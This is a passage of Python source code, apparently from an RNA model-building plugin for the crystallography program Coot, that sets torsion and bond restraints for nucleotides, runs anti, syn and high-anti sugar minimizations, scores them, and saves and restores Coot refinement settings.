nextResAlreadyBuilt - should be True if the next residue is already built (i.e. if we are being
called from recalcCoords instead of calcCoords)
Defaults to False.
fixPrevPhosOxy - whether to fix the phosphoryl oxygens of the previous nucleotide during minimization
pucker - the sugar pucker for this nucleotide. Only necessary when both curRot
and nextRot are None (i.e. when we're building the only nucleotide of the chain)
Defaults to None
nextResAtoms - a hash of atoms containing coordinates for the next phosphate.
Should only be provided if we are building the only nucleotide of the chain
Defaults to None
ignoreDensity - ignore the density when performing the minimization
defaults to False
RETURNS:
newCoords - new atomic coordinates calculated by the minimization procedure, formatted as a list of dictionaries
score - the score received from Coot's minimization
"""
#print "*** Running __minCoords with:"
#print "*** prevResNum =", prevResNum, ",\tcurResNum =", curResNum, ",\tnextResNum =", nextResNum
#print "*** curRot =", curRot
#print "*** nextRot =", nextRot
#print "*** prevResType =", prevResType, "curResType =", curResType, "nextResType =", nextResType
#print "*** fixPrevPhosOxy =", fixPrevPhosOxy
#sleep(2)
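#Overall strategy (summarized from the code below): build the sugar in the anti orientation and minimize;
#if the refinement score is worse than SYN_REBUILDING_CUTOFF, restore the pre-minimization structure, rebuild
#the sugar as syn, and minimize again; if the best score is still worse than HIGH_ANTI_REBUILDING_CUTOFF, also
#try a high-anti sugar. Whichever starting structure produced the lowest score is kept.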
chain = pseudoMol.chain
#initialize the refinement score variables so that we can easily print them later without worrying about them being undefined
antiRefinementScore = None
synRefinementScore = None
highAntiRefinementScore = None
selectedStartingStruc = None
#if we're not using Phenix restraints, then we don't need the i-2 residue number
if not USE_PHENIX_RESTRAINTS:
#By setting prevPrevResNum to None, that residue won't be included in the minimization
#(which is what we want if we're not using Phenix restraints)
prevPrevResNum = None
#build an anti sugar
if isinstance(curRot, str):
#if curRot is None or a list (indicating that we're manually setting torsions), then don't use it to determine the sugar pucker
curPucker = puckerList[curRot][1]
elif nextRot is not None:
curPucker = puckerList[nextRot][0]
else:
curPucker = pucker
initSugarCoords = sugarBuilder.buildSugar(curResAtoms, curPucker)
pseudoMol.addSugar(curResNum, initSugarCoords)
#if we're building the only nucleotide of the chain, then build the phosphates before minimization
if nextResAtoms is not None:
sugarAndP = dict(curResAtoms.items()+initSugarCoords.items())
phosOxyCoords5 = buildInitOrTerminalPhosOxy(sugarAndP)
pseudoMol.addPhosOxy(curResNum, phosOxyCoords5)
phosOxyCoords3 = buildInitOrTerminalPhosOxy(nextResAtoms, sugarAndP)
pseudoMol.addPhosOxy(nextResNum, phosOxyCoords3)
#store the structure of the previous and next nucleotides, so we can restore them if we restart minimization with a syn sugar
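#note: "prevResNum or curResNum" falls back to curResNum when prevResNum is None (i.e. when we're
#building the first nucleotide of the chain); the same idiom is used throughout this function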
preMinimizationStruc = pseudoMol.getCootNucs(prevResNum or curResNum, nextResNum)
#uncomment these lines to produce a Coot script for the minimization (i.e a script that will replicate the minimization we're about to do)
#if curResNum == 8:
# import sys
# if sys.modules.has_key("genMinimizationScript"): del sys.modules["genMinimizationScript"]
# from genMinimizationScript import genMinimizationScript
# genMinimizationScript("lastNucMin.py", pseudoMol, prevResNum, curResNum, nextResNum, curRot, nextRot, prevResType, curResType, nextResType, curResAtoms, nextResAlreadyBuilt, fixPrevPhosOxy)
# raise Exception #don't actually run the minimization
#set the appropriate restraints
molNum = pseudoMol.molNum()
__fixAtoms(pseudoMol, prevResNum, curResNum, nextResNum, fixPrevPhosOxy)
__setTorsionRestraints(molNum, chain, prevResNum, curResNum, nextResNum, curRot, nextRot, curResType, nextResAlreadyBuilt)
if USE_PHENIX_RESTRAINTS:
__addPhenixRestraints(molNum, chain, prevPrevResNum, prevResNum, curResNum, nextResNum, curRot, nextRot, curResType, nextResAlreadyBuilt)
if prevPrevResNum is not None:
#when USE_PHENIX_RESTRAINTS is true, we remove the polymer-type from RNA nucleotides so that
#we can overwrite the link restraints (i.e. restraints spanning more than one nucleotide)
#as a side-effect of this, Coot no longer implicitly includes flanking nucleotides in the minimization
#as a result, the non-bridging oxygens of prevResNum will be improperly positioned unless we manually
#include the fully immobilized prevPrevResNum in the minimization
__fixEntireResidue(molNum, chain, prevPrevResNum, pseudoMol.getAtomNames(prevPrevResNum, strip=False))
#minimize the structure
antiRefinementScore = __runRefinement(molNum, chain, prevPrevResNum or prevResNum or curResNum, nextResNum, ignoreDensity)
score = antiRefinementScore
selectedStartingStruc = "anti"
#check how good the results of the minimization are to decide if we should restart with a syn chi
if antiRefinementScore > SYN_REBUILDING_CUTOFF:
#if False:
#if the minimization did not end well, then we should restart it with a syn sugar
#first, store the results of this minimization
newCoords = pseudoMol.updateRes(prevResNum or curResNum, nextResNum)
#antiRefinementStruc = pseudoMol.getCootNucs((resNum-1 or resNum) - 1, resNum)
antiRefinementStruc = pseudoMol.getCootNucs(prevResNum or curResNum, nextResNum)
#restore the structure as it was before minimization
#pseudoMol.setCootNucs((resNum-1 or resNum) - 1, resNum, preMinimizationStruc, False)
pseudoMol.setCootNucs(prevResNum or curResNum, nextResNum, preMinimizationStruc, False)
#Note: the False fourth argument skips running clear_and_update_molecule, since that will be run by
#replaceSugar() below
#calculate syn sugar coordinates
synSugarCoords = rotateSugar(initSugarCoords, curResAtoms, "syn")
pseudoMol.replaceSugar(curResNum, synSugarCoords)
#uncomment these lines to produce a Coot script for the minimization (i.e a script that will replicate the minimization we're about to do)
#if curResNum == 8:
# import sys
# if sys.modules.has_key("genMinimizationScript"): del sys.modules["genMinimizationScript"]
# from genMinimizationScript import genMinimizationScript
# genMinimizationScript("lastNucMin.py", pseudoMol, prevResNum, curResNum, nextResNum, curRot, nextRot, prevResType, curResType, nextResType, curResAtoms, nextResAlreadyBuilt, fixPrevPhosOxy)
# raise Exception
synRefinementScore = __runRefinement(molNum, chain, prevPrevResNum or prevResNum or curResNum, nextResNum, ignoreDensity)
#if the syn refinement wasn't better than the anti refinement, then go back to the anti structure
if synRefinementScore >= antiRefinementScore:
pseudoMol.setCootNucs(prevResNum or curResNum, nextResNum, antiRefinementStruc)
#we don't need to run pseudoMol.updateRes() here since it was run above
else:
newCoords = pseudoMol.updateRes(prevResNum or curResNum, nextResNum)
score = synRefinementScore
selectedStartingStruc = "syn"
else:
#update the Pseudomolecule object so that it knows about the moved atoms
newCoords = pseudoMol.updateRes(prevResNum or curResNum, nextResNum)
#try a high-anti structure if the best score is still too high
if score > HIGH_ANTI_REBUILDING_CUTOFF:
prevRefinementStruc = pseudoMol.getCootNucs(prevResNum or curResNum, nextResNum)
pseudoMol.setCootNucs(prevResNum or curResNum, nextResNum, preMinimizationStruc, False)
highAntiSugarCoords = rotateSugar(initSugarCoords, curResAtoms, "high-anti")
pseudoMol.replaceSugar(curResNum, highAntiSugarCoords)
#raise Exception
highAntiRefinementScore = __runRefinement(molNum, chain, prevPrevResNum or prevResNum or curResNum, nextResNum, ignoreDensity)
if highAntiRefinementScore >= score:
pseudoMol.setCootNucs(prevResNum or curResNum, nextResNum, prevRefinementStruc)
else:
newCoords = pseudoMol.updateRes(prevResNum or curResNum, nextResNum)
score = highAntiRefinementScore
selectedStartingStruc = "high-anti"
#if desired, print a summary table listing the refinement scores and the selected structure
if PRINT_SUMMARY_TABLE:
print "********************************"
print "* Starting struc * Score *"
print "********************************"
print "* Anti * %s *" % __stringifyScore(antiRefinementScore)
print "* Syn * %s *" % __stringifyScore(synRefinementScore)
print "* High-anti * %s *" % __stringifyScore(highAntiRefinementScore)
print "********************************"
print "* Using %s minimization" % selectedStartingStruc + " " * (9-len(selectedStartingStruc)) + " *"
print "********************************"
#from time import sleep; sleep(2)
#pprint(newCoords)
#if we haven't already, build the non-bridging oxygens
if nextResAtoms is None:
curResIndex = pseudoMol.resIndex(curResNum)
#print "curResIndex =", curResIndex
#print "curResNum =", curResNum
#if curResIndex == 0:
if prevResNum is None:
#if this is the first (but not only) nucleotide
(newCurResAtoms, newNextResAtoms) = newCoords
phosOxyCoords = buildInitOrTerminalPhosOxy(newCurResAtoms)
if phosOxyCoords is not None:
pseudoMol.addPhosOxy(curResNum, phosOxyCoords)
elif pseudoMol.numAtomsFromIndex(curResIndex+1) == 1 and not pseudoMol.connectedToNextFromIndex(curResIndex+1):
#if the next residue is just a terminal 3' phosphate, then we need to add non-bridging oxygens
(newPrevResAtoms, newCurResAtoms, newNextResAtoms) = newCoords
phosOxyCoords5 = buildPhosOxy(newCurResAtoms, newPrevResAtoms)
if phosOxyCoords5 is not None:
pseudoMol.addPhosOxy(curResNum, phosOxyCoords5)
phosOxyCoords3 = buildInitOrTerminalPhosOxy(newNextResAtoms, newCurResAtoms)
if phosOxyCoords3 is not None:
pseudoMol.addPhosOxy(nextResNum, phosOxyCoords3)
else:
#if this is a middle nucleotide of a chain
#from pprint import pprint; pprint(newCoords)
(newPrevResAtoms, newCurResAtoms, newNextResAtoms) = newCoords
phosOxyCoords = buildPhosOxy(newCurResAtoms, newPrevResAtoms)
if phosOxyCoords is not None:
pseudoMol.addPhosOxy(curResNum, phosOxyCoords)
#clear the fixed atoms and torsional restraints
__clearResRestraints(molNum)
return (newCoords, score)
def __stringifyScore(score):
"""Format a refinement score for printing in the summary table
ARGUMENTS:
score - the refinement score
RETURNS:
score formatted as a fixed length string or "Not run" if score is None
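For example (illustrative values):
__stringifyScore(12.3456) returns " 12.346"
__stringifyScore(None) returns "Not run"
__stringifyScore(REFINEMENT_FAIL_SCORE) returns " Failed"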
"""
if score == REFINEMENT_FAIL_SCORE:
return " Failed"
elif score is not None:
return "%7.3f" % score
else:
return "Not run"
def __fixAtoms(pseudoMol, prevResNumFull, curResNumFull, nextResNumFull, fixPrevPhosOxy):
"""Fix and restrain the appropriate atoms for minimization
ARGUMENTS:
pseudoMol - the PseudoMolecule object representing the molecule to fix atoms in
prevResNumFull - the residue number of the previous residue using Coot numbering (i.e. starting at 1, not 0) including insertion code
curResNumFull - the residue number using Coot numbering (i.e. starting at 1, not 0) including insertion code
nextResNumFull - the residue number of the next residue using Coot numbering (i.e. starting at 1, not 0) including insertion code
OPTIONAL ARGUMENTS:
fixPrevPhosOxy - whether to fix the phosphoryl oxygens of the previous nucleotide during minimization
Defaults to False
RETURNS:
None
"""
molNum = pseudoMol.molNum()
chain = pseudoMol.chain
(prevResNum, prevResInsCode) = __splitResNum(prevResNumFull)
(curResNum, curResInsCode) = __splitResNum(curResNumFull)
(nextResNum, nextResInsCode) = __splitResNum(nextResNumFull)
#debugOut = open("fixAtoms.txt", "a")
#debugOut.write("Minimizing "+ ", ".join(map(str, [prevResNumFull, curResNumFull, nextResNumFull])) + "\n")
fixList = [] #the list of atoms to fix
#fix atoms from the previous residue
if prevResNum is not None:
#fix the previous non-bridging oxygens if this is the first minimization of a recalcSuites
if fixPrevPhosOxy:
prevResMobileAtoms = PREV_RES_MOBILE_ATOMS
else:
prevResMobileAtoms = PREV_RES_MOBILE_ATOMS.union(["OP1", "OP2"])
for curAtom in pseudoMol.getAtomNames(prevResNum, strip=False):
if curAtom.strip() not in prevResMobileAtoms:
fixList.append([chain, prevResNum, prevResInsCode, curAtom, ""])
#debugOut.write(",".join(map(str, [chain, prevResNum, prevResInsCode, curAtom, ""])) + "\n")
#restrain the starting and ending phosphates
add_extra_start_pos_restraint(molNum, chain, curResNum , curResInsCode, " P ", "", HARMONIC_STD_DEV_PHOSPHATE)
add_extra_start_pos_restraint(molNum, chain, nextResNum, nextResInsCode, " P ", "", HARMONIC_STD_DEV_PHOSPHATE)
#debugOut.write(",".join(map(str, [molNum, chain, curResNum , curResInsCode, " P ", "", HARMONIC_STD_DEV_PHOSPHATE])) + "\n")
#debugOut.write(",".join(map(str, [molNum, chain, nextResNum, nextResInsCode, " P ", "", HARMONIC_STD_DEV_PHOSPHATE])) + "\n")
#restrain atoms from the current residue base + C1'
for curAtom in pseudoMol.getAtomNames(curResNum, strip=False):
if curAtom.strip() not in CUR_RES_MOBILE_ATOMS:
#fixList.append([chain, resNum, "", curAtom, ""])
add_extra_start_pos_restraint(molNum, chain, curResNum , curResInsCode, curAtom, "", HARMONIC_STD_DEV_BASE)
#debugOut.write(",".join(map(str, [molNum, chain, curResNum , curResInsCode, curAtom, "", HARMONIC_STD_DEV_BASE])) + "\n")
#fix atoms from the next residue
if nextResNum is not None:
for curAtom in pseudoMol.getAtomNames(nextResNum, strip=False):
if curAtom.strip() not in NEXT_RES_MOBILE_ATOMS:
fixList.append([chain, nextResNum, nextResInsCode, curAtom, ""])
#debugOut.write(",".join(map(str, [chain, nextResNum, nextResInsCode, curAtom, ""])) + "\n")
mark_multiple_atoms_as_fixed(molNum, fixList, 1)
#debugOut.close()
def __setTorsionRestraints(molNum, chain, prevResNumFull, curResNumFull, nextResNumFull, curRot, nextRot, curResType, nextResAlreadyBuilt = False):
"""Set the appropriate torsional restraints for the minimization
ARGUMENTS:
molNum - the Coot molecule number
chain - the chain name
prevResNumFull - the residue number of the previous residue including insertion codes
curResNumFull - the residue number to build including insertion codes
nextResNumFull - the residue number of the next residue including insertion codes
curRot - the rotamer to use when building the current residue
nextRot - the rotamer to use when building the next residue
curResType - the residue type (i.e. A, G, C, or U) of the current residue
OPTIONAL ARGUMENTS:
nextResAlreadyBuilt - should be True if the next residue is already built (i.e. if we are being
called from recalcCoords instead of calcCoords)
Defaults to False.
RETURNS:
None
"""
(prevResNum, prevResInsCode) = __splitResNum(prevResNumFull)
(curResNum, curResInsCode) = __splitResNum(curResNumFull)
(nextResNum, nextResInsCode) = __splitResNum(nextResNumFull)
if curRot is not None:
#print "Adding custom torsional restraints for residue", curResNum, "currot %s" % curRot
if isinstance(curRot, str):
prevDelta = rotData.prevDeltaMean(curRot)
ep = rotData.epMean (curRot)
zeta = rotData.zetaMean (curRot)
alpha = rotData.alphaMean(curRot)
beta = rotData.betaMean (curRot)
gamma = rotData.gammaMean(curRot)
prevDeltaSD = rotData.prevDeltaSD(curRot) * TORSION_STD_DEV_MOD
epSD = rotData.epSD(curRot) * TORSION_STD_DEV_MOD
zetaSD = rotData.zetaSD (curRot) * TORSION_STD_DEV_MOD
alphaSD = rotData.alphaSD(curRot) * TORSION_STD_DEV_MOD
betaSD = rotData.betaSD (curRot) * TORSION_STD_DEV_MOD
gammaSD = rotData.gammaSD(curRot) * TORSION_STD_DEV_MOD
else:
prevDelta = curRot[0]
ep = curRot[1]
zeta = curRot[2]
alpha = curRot[3]
beta = curRot[4]
gamma = curRot[5]
prevDeltaSD = MANUAL_TORSION_STD_DEV
epSD = MANUAL_TORSION_STD_DEV
zetaSD = MANUAL_TORSION_STD_DEV
alphaSD = MANUAL_TORSION_STD_DEV
betaSD = MANUAL_TORSION_STD_DEV
gammaSD = MANUAL_TORSION_STD_DEV
#previous delta
if prevDelta is not None:
add_extra_torsion_restraint(molNum, chain, prevResNum, prevResInsCode, " C5'", "",
chain, prevResNum, prevResInsCode, " C4'", "",
chain, prevResNum, prevResInsCode, " C3'", "",
chain, prevResNum, prevResInsCode, " O3'", "",
prevDelta, prevDeltaSD, 1)
#epsilon
if ep is not None:
add_extra_torsion_restraint(molNum, chain, prevResNum, prevResInsCode, " C4'", "",
chain, prevResNum, prevResInsCode, " C3'", "",
chain, prevResNum, prevResInsCode, " O3'", "",
chain, curResNum, curResInsCode, " P ", "",
ep, epSD, 1)
#zeta
if zeta is not None:
add_extra_torsion_restraint(molNum, chain, prevResNum, prevResInsCode, " C3'", "",
chain, prevResNum, prevResInsCode, " O3'", "",
                                        chain, curResNum, curResInsCode, " P  ", "",
chain, curResNum, curResInsCode, " O5'", "",
zeta, zetaSD, 1)
#alpha
if alpha is not None:
add_extra_torsion_restraint(molNum, chain, curResNum, curResInsCode, " C5'", "",
chain, curResNum, curResInsCode, " O5'", "",
chain, curResNum, curResInsCode, " P ", "",
chain, prevResNum, prevResInsCode, " O3'", "",
alpha, alphaSD, 1)
#beta
if beta is not None:
add_extra_torsion_restraint(molNum, chain, curResNum, curResInsCode, " P ", "",
chain, curResNum, curResInsCode, " O5'", "",
chain, curResNum, curResInsCode, " C5'", "",
chain, curResNum, curResInsCode, " C4'", "",
beta, betaSD, 1)
#gamma
if gamma is not None:
add_extra_torsion_restraint(molNum, chain, curResNum , curResInsCode, " O5'", "",
chain, curResNum , curResInsCode, " C5'", "",
chain, curResNum , curResInsCode, " C4'", "",
chain, curResNum , curResInsCode, " C3'", "",
gamma, gammaSD, 1)
#add constraints on delta and the ring torsions
curPucker = None
delta = None
if isinstance(curRot, str):
curPucker = puckerList[curRot][1]
delta = rotData.curDeltaMean(curRot)
deltaSD = rotData.curDeltaSD(curRot)*TORSION_STD_DEV_MOD
elif isinstance(nextRot, str):
curPucker = puckerList[nextRot][0]
delta = rotData.prevDeltaMean(nextRot)
deltaSD = rotData.prevDeltaSD(nextRot)*TORSION_STD_DEV_MOD
if delta is not None:
add_extra_torsion_restraint(molNum, chain, curResNum , curResInsCode, " C5'", "",
chain, curResNum , curResInsCode, " C4'", "",
chain, curResNum , curResInsCode, " C3'", "",
chain, curResNum , curResInsCode, " O3'", "",
delta, deltaSD, 1)
if curPucker is not None:
#print "adding ring constraints"
if curPucker == 2:
curNu0 = NU0_C2
curNu1 = NU1_C2
curNu4 = NU4_C2
else:
curNu0 = NU0_C3
curNu1 = NU1_C3
curNu4 = NU4_C3
#current nu0
add_extra_torsion_restraint(molNum, chain, curResNum , curResInsCode, " C4'", "",
chain, curResNum , curResInsCode, " O4'", "",
chain, curResNum , curResInsCode, " C1'", "",
chain, curResNum , curResInsCode, " C2'", "",
curNu0, NU_STD_DEV, 1)
#current nu1
add_extra_torsion_restraint(molNum, chain, curResNum , curResInsCode, " O4'", "",
chain, curResNum , curResInsCode, " C1'", "",
chain, curResNum , curResInsCode, " C2'", "",
chain, curResNum , curResInsCode, " C3'", "",
curNu1, NU_STD_DEV, 1)
#current nu4
add_extra_torsion_restraint(molNum, chain, curResNum , curResInsCode, " C5'", "",
chain, curResNum , curResInsCode, " C4'", "",
chain, curResNum , curResInsCode, " O4'", "",
chain, curResNum , curResInsCode, " C1'", "",
curNu4, NU_STD_DEV, 1)
#print "adding chi restraint"
#redefine the chi restraints, since Coot uses a very strange default value
#(Note that even though the base is fixed, this chi restraint can affect the sugar positioning)
if curResType == "G" or curResType == "A":
baseAtom1 = " N9 "
baseAtom2 = " C4 "
else:
baseAtom1 = " N1 "
baseAtom2 = " C2 "
add_extra_torsion_restraint(molNum, chain, curResNum , curResInsCode, " O4'", "",
chain, curResNum , curResInsCode, " C1'", "",
chain, curResNum , curResInsCode, baseAtom1, "",
chain, curResNum , curResInsCode, baseAtom2, "",
CHI_MEAN, CHI_STD_DEV, 2)
#Note that this torsion has a period of 2 (which means a period of 360/2=180 degrees) to account for anti and syn rotations
if nextRot is not None:
if isinstance(nextRot, str):
ep = rotData.epMean(nextRot)
epSD = rotData.epSD(nextRot) * TORSION_STD_DEV_MOD
if nextResAlreadyBuilt:
zeta = rotData.zetaMean(nextRot)
alpha = rotData.alphaMean(nextRot)
beta = rotData.betaMean(nextRot)
gamma = rotData.gammaMean(nextRot)
zetaSD = rotData.zetaSD(nextRot) * TORSION_STD_DEV_MOD
alphaSD = rotData.alphaSD(nextRot) * TORSION_STD_DEV_MOD
betaSD = rotData.betaSD(nextRot) * TORSION_STD_DEV_MOD
gammaSD = rotData.gammaSD(nextRot) * TORSION_STD_DEV_MOD
else:
ep = nextRot[1]
epSD = MANUAL_TORSION_STD_DEV
if nextResAlreadyBuilt:
zeta = nextRot[2]
alpha = nextRot[3]
beta = nextRot[4]
gamma = nextRot[5]
zetaSD = MANUAL_TORSION_STD_DEV
alphaSD = MANUAL_TORSION_STD_DEV
betaSD = MANUAL_TORSION_STD_DEV
gammaSD = MANUAL_TORSION_STD_DEV
#print "Adding custom torsional restraints for nextrot %s" % nextRot
if ep is not None:
add_extra_torsion_restraint(molNum, chain, curResNum , curResInsCode, " C4'", "",
chain, curResNum , curResInsCode, " C3'", "",
chain, curResNum , curResInsCode, " O3'", "",
chain, nextResNum , nextResInsCode, " P ", "",
ep, epSD, 1)
if nextResAlreadyBuilt:
#if we're rebuilding a section and about to meet up with the existing structure, we need more constraints
#zeta
if zeta is not None:
#torsions can be None when we're rotamerizing and the last nucleotide is missing atoms
add_extra_torsion_restraint(molNum, chain, curResNum , curResInsCode, " C3'", "",
chain, curResNum , curResInsCode, " O3'", "",
chain, nextResNum, nextResInsCode, " P ", "",
chain, nextResNum, nextResInsCode, " O5'", "",
zeta, zetaSD, 1)
#alpha
if alpha is not None:
add_extra_torsion_restraint(molNum, chain, nextResNum, nextResInsCode, " C5'", "",
chain, nextResNum, nextResInsCode, " O5'", "",
chain, nextResNum, nextResInsCode, " P ", "",
chain, curResNum , curResInsCode, " O3'", "",
alpha, alphaSD, 1)
#beta
if beta is not None:
add_extra_torsion_restraint(molNum, chain, nextResNum, nextResInsCode, " P ", "",
chain, nextResNum, nextResInsCode, " O5'", "",
chain, nextResNum, nextResInsCode, " C5'", "",
chain, nextResNum, nextResInsCode, " C4'", "",
beta, betaSD, 1)
#gamma
if gamma is not None:
add_extra_torsion_restraint(molNum, chain, nextResNum, nextResInsCode, " O5'", "",
chain, nextResNum, nextResInsCode, " C5'", "",
chain, nextResNum, nextResInsCode, " C4'", "",
chain, nextResNum, nextResInsCode, " C3'", "",
gamma, gammaSD, 1)
def __runRefinement(molNum, chain, startingResNumFull, endingResNumFull, ignoreDensity = False):
"""Run the minimization using Coot's built-in refinement functions
ARGUMENTS:
molNum - the Coot molecule number
chain - the chain name
startingResNumFull - the residue number (including insertion code) of the first nucleotide to refine
endingResNumFull - the residue number (including insertion code) of the last nucleotide to refine
OPTIONAL ARGUMENTS:
ignoreDensity - ignore the density when performing the minimization
defaults to False
RETURNS:
the refinement score
"""
print "*************************"
print "About to refine residues", startingResNumFull, "-", endingResNumFull
print "*************************"
(startingResNum, startingResInsCode) = __splitResNum(startingResNumFull)
(endingResNum, endingResInsCode) = __splitResNum(endingResNumFull)
#refine_zone and refine_zone_with_score don't support insertion codes, so for now the insertion codes get ignored
#this will cause problems if trying to rotamerize a chain that uses insertion codes
if ignoreDensity:
refinementResults = regularize_zone_with_score(molNum, chain, startingResNum, endingResNum, "")
else:
#note that we need to use refine_zone_with_score, not refine_residues, since refine_residues assumes that things aren't bonded if they're more than three Angstroms apart
refinementResults = refine_zone_with_score(molNum, chain, startingResNum, endingResNum, "")
accept_regularizement()
return __calcRefinementScore(refinementResults)
def __clearResRestraints(molNum):
"""Clear the torsional restraints and fixed atoms that applied to the residues we were just minimizing
ARGUMENTS:
molNum - the Coot molecule number
RETURNS:
None
"""
clear_all_fixed_atoms(molNum)
delete_all_extra_restraints(molNum)
#a regex to separate a residue name and insertion code
__splitResNumRE = re.compile("(-?\d+)([A-Za-z]?)$")
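#for example, this splits "15" into ("15", ""), "15A" into ("15", "A"), and "-3" into ("-3", "")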
def __splitResNum(resNumFull):
"""Split a residue number into number and insertion code
ARGUMENTS:
resNumFull - a residue number potentially containing an insertion code
RETURNS:
resNum - the residue number without the insertion code (as an int)
insCode - the insertion code
"""
if resNumFull is None:
return (None, None)
else:
(resNum, insCode) = __splitResNumRE.match(str(resNumFull)).groups()
resNum = int(resNum) #the Coot SWIG functions require an integer argument, so we do explicit cast here
return (resNum, insCode)
def __changeMonomerRestraints():
"""Change the monomer restraints for RNA residues
ARGUMENTS:
None
RETURNS:
origRestraints - the original monomer restraints (so we can restore them later)
"""
origRestraints = {}
for curNuc in ("A", "G", "C", "U"):
origRestraints[curNuc] = monomer_restraints(curNuc)
newRestraints = monomer_restraints(curNuc) #we need a new copy of the dictionary so we don't modify the originalRestraints dict
#this next line is redundant with use_only_extra_torsion_restraints_for_torsions(1), but it certainly won't hurt anything
#use_only_extra_torsion_restraints_for_torsions(1) also has the advantage of turning off the link torsion restraints
#(i.e. restraints that span two nucleotides), but the link torsion restraints don't seem to be used during minimization
#regardless
newRestraints['_chem_comp_tor'] = []
#we don't need any of the existing restraints since we're rewriting all of the named restraints
#and the CONST restraints are redundant with the planar restraints (and seem to be ignored by Coot anyway)
#make the plane restraints tighter (change standard deviation from 0.020 to 0.001)
#since we really don't want non-planar bases (they can be a pain to fix later)
for curPlane in newRestraints['_chem_comp_plane_atom']:
curPlane[2] = 0.001
#if we're going to be using Phenix's restraints, then remove the default backbone bond and angle restraints
if USE_PHENIX_RESTRAINTS == True:
newRestraints['_chem_comp_angle'] = [curAngle for curAngle in newRestraints['_chem_comp_angle'] if not(curAngle[0].strip() in PHENIX_NEW_RESTRAINT_ATOMS and curAngle[1].strip() in PHENIX_NEW_RESTRAINT_ATOMS and curAngle[2].strip() in PHENIX_NEW_RESTRAINT_ATOMS)]
#add the Phenix restraints that aren't pucker specific
newRestraints['_chem_comp_angle'].extend([[" C2'", " C3'", " C4'", 102.6, 1.0],
[" C5'", " O5'", " P ", 120.9, 1.0],
[" O5'", " P ", " OP1", 110.7, 1.000],
[" OP1", " P ", " OP2", 119.6, 1.000],
[" O5'", " P ", " OP2", 110.7, 1.000]])
newRestraints['_chem_comp_bond'] = [curBond for curBond in newRestraints['_chem_comp_bond'] if not (curBond[0].strip() in PHENIX_NEW_RESTRAINT_ATOMS and curBond[1].strip() in PHENIX_NEW_RESTRAINT_ATOMS)]
#add in the bond restraints that aren't pucker specific
newRestraints['_chem_comp_bond'].extend([[" P ", " O5'", 'single', 1.593, 0.015],
[" P ", " OP1", 'deloc', 1.485, 0.020],
[" P ", " OP2", 'deloc', 1.485, 0.020]])
#remove the polymer type so that we can replace the link restraints (restraints that span two nucleotides)
#there's no way to set proper link restraints, so all link restraints are set as extra restraints in phenixRestraints.py
newRestraints['_chem_comp'][3] = "" #previously, this value was "RNA"
set_monomer_restraints(curNuc, newRestraints)
return origRestraints
def __changeCootSettings():
"""Change Coot's minimization settings
ARGUMENTS:
None
RETURNS:
these values are returned so the minimization settings can be restored later
origImmediateReplaceValue - the original refinement_immediate_replacement_state() value
origRefineWithTorsionsValue - the original refine_with_torsion_restraints_state()
origWeightValue - the original matrix_state() value
origMonomerRestraints - the original monomer restraints (i.e. torsion restraints)
origUseOnlyExtraTorsionValue - the original settings for use_only_extra_torsion_restraints_for_torsions
"""
#we're going to have to change some Coot settings during the coordinate calculation
#so check what the existing values are so we can set them back
origImmediateReplaceValue = refinement_immediate_replacement_state() #don't ask the user to accept the refinement
origRefineWithTorsionsValue = refine_with_torsion_restraints_state() #whether or not we use torsional constraints
origWeightValue = matrix_state() #how much weight is placed on geometry vs. map constraints
#origNumStepsPerFrameValue = refinement_refine_per_frame_state() #how many steps of refinement occur in between updating graphics
origUseOnlyExtraTorsionValue = use_only_extra_torsion_restraints_for_torsions_state() #should we ignore the standard torsion restraints and only use the user-defined ones
#set the values that we want
set_refinement_immediate_replacement(1)
set_refine_with_torsion_restraints(1)
set_matrix(REFINE_MAP_WEIGHT)
#dragged_refinement_steps_per_frame()
#in theory, a large value here should cause Coot to not update the graphics as it refines (which should speed up refinement)
#but Coot doesn't seem to like it when this value is too high
#and Windows thinks that Coot has frozen if it takes too long
#so we just leave this at the default
#set_use_only_extra_torsion_restraints_for_torsions(1)
set_use_only_extra_torsion_restraints_for_torsions(0)
#this function seems to entirely disable torsion restraints, which is the opposite of what it's supposed to do
#as a result, we make sure it's turned off rather than making sure it's turned on
#I should probably fix this function/flag in Coot
#remove all built-in torsional restraints from RNA nucleotides
origMonomerRestraints = __changeMonomerRestraints()
return (origImmediateReplaceValue, origRefineWithTorsionsValue, origWeightValue, origMonomerRestraints, origUseOnlyExtraTorsionValue)
def __restoreCootSettings(origCootSettings):
"""Restore Coot's minimization settings
ARGUMENTS:
origCootSettings - Coot settings to be restored (as returned by __changeCootSettings)
RETURNS:
None
"""
(origImmediateReplaceValue, origRefineWithTorsionsValue, origWeightValue, origMonomerRestraints, origUseOnlyExtraTorsionValue) = origCootSettings
set_refinement_immediate_replacement(origImmediateReplaceValue)
set_refine_with_torsion_restraints(origRefineWithTorsionsValue)
set_matrix(origWeightValue)
set_use_only_extra_torsion_restraints_for_torsions(origUseOnlyExtraTorsionValue)
for curNuc in ("A", "G", "C", "U"):
set_monomer_restraints(curNuc, origMonomerRestraints[curNuc])
def __calcRefinementScore(refinementResults):
"""Calculate an overall score for the quality of the refinement results
ARGUMENTS:
refinementResults - the output of refine_residues()
RETURNS:
overallScore - an overall refinement score based on the bond length, angles, and torsions
"""
#from pprint import pprint; pprint(refinementResults)
scoreList = refinementResults[2]
if not scoreList:
#if there is no scorelist, then Coot gave up on the minimization
#(Modifying Coot to return a score when the minimization times out is do-able, but it would slightly slow
#down all minimizations unless more significant changes to the minimizer code are made. Typically, if we've
#timed out, then something has gone wrong anyway, so simply using REFINEMENT_FAIL_SCORE is a workable solution.)
return REFINEMENT_FAIL_SCORE
overallScore = 0
for curScore in scoreList:
if curScore[0] in ["Bonds", "Angles", "Torsions"]:
#TODO: add in start_pos scores?
overallScore += curScore[2]
return overallScore
def __addPhenixRestraints(molNum, chain, prevPrevResNumFull, prevResNumFull, curResNumFull, nextResNumFull, curRot, nextRot, curResType, nextResAlreadyBuilt = False, onlyPucker = None):
"""Add angle and bond restraints for the specified nucleotides using the Phenix pucker-specific restraint values
ARGUMENTS
molNum - the Coot molecule number
chain - the chain name
prevPrevResNumFull - the residue number of residue i-2 (needed to restrain the non-bridging oxygens of residue prevResNum)
prevResNumFull - the residue number of the previous residue using Coot numbering (i.e. starting at 1, not 0)
curResNumFull - the residue number to build using Coot numbering (i.e. starting at 1, not 0)
nextResNumFull - the residue number of the next residue using Coot numbering (i.e. starting at 1, not 0)
curRot - the rotamer to use when building the current residue
nextRot - the rotamer to use when building the next residue
curResType - the residue type (i.e. A, G, C, or U) of the current residue
OPTIONAL ARGUMENTS:
nextResAlreadyBuilt - should be True if the next residue is already built (i.e. if we are being
called from recalcCoords instead of calcCoords)
